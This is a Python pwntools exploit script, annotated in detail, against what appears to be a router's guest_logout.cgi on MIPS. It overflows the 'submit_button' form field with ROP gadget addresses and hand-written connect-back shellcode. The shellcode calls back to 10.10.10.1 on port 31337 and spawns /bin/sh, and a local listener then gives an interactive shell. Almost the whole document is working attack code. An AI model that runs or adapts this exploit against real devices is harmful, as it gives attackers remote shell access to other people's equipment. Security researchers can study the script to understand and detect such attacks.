from
pwn
import
*
import
thread,requests
# pwntools global context: 32-bit little-endian MIPS on Linux. asm() and p32()
# further down assemble/pack according to these settings, so they must match
# the target CPU or the payload bytes are wrong. 'debug' makes pwntools print
# every byte sent/received.
context(arch='mips', endian='little', os='linux', log_level='debug')
# Listener on port 31337; wait_for_connection() at the end of the script blocks
# on it. The port value reappears, byte-swapped, inside the shellcode's sockaddr
# (0x7A69 == 31337), so the two must be kept in sync if either is changed.
io = listen(31337)
# Hard-coded libc load address plus two gadget offsets. A fixed base only works
# if the target process maps libc at the same address every run (i.e. no
# effective ASLR); the names suggest "jump to $a0" / "jump to $s0" gadgets,
# which is inferred from the identifiers, not verified here.
libc = 0x77a6a000
jmp_a0 = libc + 0x0003D050
jmp_s0 = libc + 0x000257A0
# Hand-written MIPS connect-back shell, built as one assembly listing and
# assembled with the pwntools context above. Syscall numbers are the Linux
# MIPS o32 ones (4000 + number). Small register constants are produced with
# slti/not instead of literal loads, presumably to keep zero bytes out of the
# encoding; `syscall 0x42424` is the same instruction with a non-zero code field.
#
# Section 1: close(0), close(1), close(2) via syscall 4006.
# (The first slti line is duplicated; the repeat is harmless.)
shellcode = "slti $a0, $zero, 0xFFFF\n"
shellcode += "slti $a0, $zero, 0xFFFF\n"
shellcode += "li $v0, 4006\n"
shellcode += "syscall 0x42424\n"
shellcode += "slti $a0, $zero, 0x1111\n"
shellcode += "li $v0, 4006\n"
shellcode += "syscall 0x42424\n"
shellcode += "li $t4, 0xFFFFFFFD\n"
shellcode += "not $a0, $t4\n"
shellcode += "li $v0, 4006\n"
shellcode += "syscall 0x42424\n"
# Section 2: socket(2, 2, 0) via syscall 4183 ($a0 = $a1 = ~0xFFFFFFFD = 2).
shellcode += "li $t4, 0xFFFFFFFD\n"
shellcode += "not $a0, $t4\n"
shellcode += "not $a1, $t4\n"
shellcode += "slti $a2, $zero, 0xFFFF\n"
shellcode += "li $v0, 4183\n"
shellcode += "syscall 0x42424\n"
# Section 3: dup2 (syscall 4041) issued twice with $a0 = returned socket fd;
# $a1 still holds 2 from the socket() setup.
shellcode += "andi $a0, $v0, 0xFFFF\n"
shellcode += "li $v0, 4041\n"
shellcode += "syscall 0x42424\n"
shellcode += "li $v0, 4041\n"
shellcode += "syscall 0x42424\n"
# Section 4: connect (syscall 4170). The sockaddr is built on the stack:
# word at -8($sp) = 0x6979FF01 + 0x0101 = 0x697A0002 -> family 2, port 0x7A69
# (31337, matching the listener); word at -4($sp) = 0x010A0A0A, i.e. the
# little-endian bytes 10.10.10.1; length $a2 = ~0xFFFFFFEF = 16.
shellcode += "lui $a1, 0x6979\n"
shellcode += "ori $a1, 0xFF01\n"
shellcode += "addi $a1, $a1, 0x0101\n"
shellcode += "sw $a1, -8($sp)\n"
shellcode += "li $a1, 0x010A0A0A\n"
shellcode += "sw $a1, -4($sp)\n"
shellcode += "addi $a1, $sp, -8\n"
shellcode += "li $t4, 0xFFFFFFEF\n"
shellcode += "not $a2, $t4\n"
shellcode += "li $v0, 4170\n"
shellcode += "syscall 0x42424\n"
# Section 5: execve (syscall 4011). The two words 0x69622f2f / 0x68732f6e are
# the little-endian bytes of "//bin/sh", stored at -20($sp) and NUL-terminated
# at -12($sp); argv at -8($sp) is [ptr, NULL]; envp ($a2) is 0.
shellcode += "lui $t0, 0x6962\n"
shellcode += "ori $t0, $t0,0x2f2f\n"
shellcode += "sw $t0, -20($sp)\n"
shellcode += "lui $t0, 0x6873\n"
shellcode += "ori $t0, 0x2f6e\n"
shellcode += "sw $t0, -16($sp)\n"
shellcode += "slti $a3, $zero, 0xFFFF\n"
shellcode += "sw $a3, -12($sp)\n"
shellcode += "sw $a3, -4($sp)\n"
shellcode += "addi $a0, $sp, -20\n"
shellcode += "addi $t0, $sp, -20\n"
shellcode += "sw $t0, -8($sp)\n"
shellcode += "addi $a1, $sp, -8\n"
shellcode += "addiu $sp, $sp, -20\n"
shellcode += "slti $a2, $zero, 0xFFFF\n"
shellcode += "li $v0, 4011\n"
shellcode += "syscall 0x42424"
# Assemble to raw bytes under the MIPS/little-endian context.
shell = asm(shellcode)
# Overflow string for the "submit_button" form field: a page name, filler,
# the two gadget addresses (each preceded by a fixed amount of padding), then
# the shellcode. The padding lengths (49, 0x20, 0x18) are stack-layout specific
# to the target binary and are not derivable from this file.
# NOTE(review): `import thread` and the str + p32() concatenation here indicate
# Python 2; under Python 3 the str/bytes mix would raise TypeError.
payload = "status_guestnet.asp" + 'a' * 49 + p32(jmp_a0) + 0x20 * 'a' + p32(jmp_s0) + 0x18 * 'a' + shell
# Form fields for the POST. Only "submit_button" carries the overflow payload;
# "cmac" and "cip" are fixed values the CGI presumably expects to be present
# (their role is not established by anything in this file).
paramsPost = {
    "cmac": "7a:29:9f:d3:d2:6e",
    "submit_button": payload,
    "cip": "192.168.1.1",
}
def attack():
    """Send the crafted form to the target's guest_logout.cgi over HTTP.

    Runs in a separate thread so the main thread can block on the listener.
    verify=False only matters for HTTPS and is a no-op for this http:// URL.
    From a monitoring standpoint the observable event is a POST to
    guest_logout.cgi whose submit_button value is several hundred bytes of
    binary rather than a short token.
    """
    try:
        requests.post("http://10.10.10.3/guest_logout.cgi", data=paramsPost, verify=False)
    except:
        # Bare except: every failure (connection refused, timeout, and any
        # programming error inside the try) is silently dropped, so a failed
        # request is indistinguishable from a successful one here.
        pass
# Fire the request on a background thread (Python 2 `thread` module), then
# block until something connects back to the 31337 listener. If the request
# fails, attack() swallows the error and this wait never returns.
thread.start_new_thread(attack, ())
io.wait_for_connection()
log.success("getshell")
io.interactive()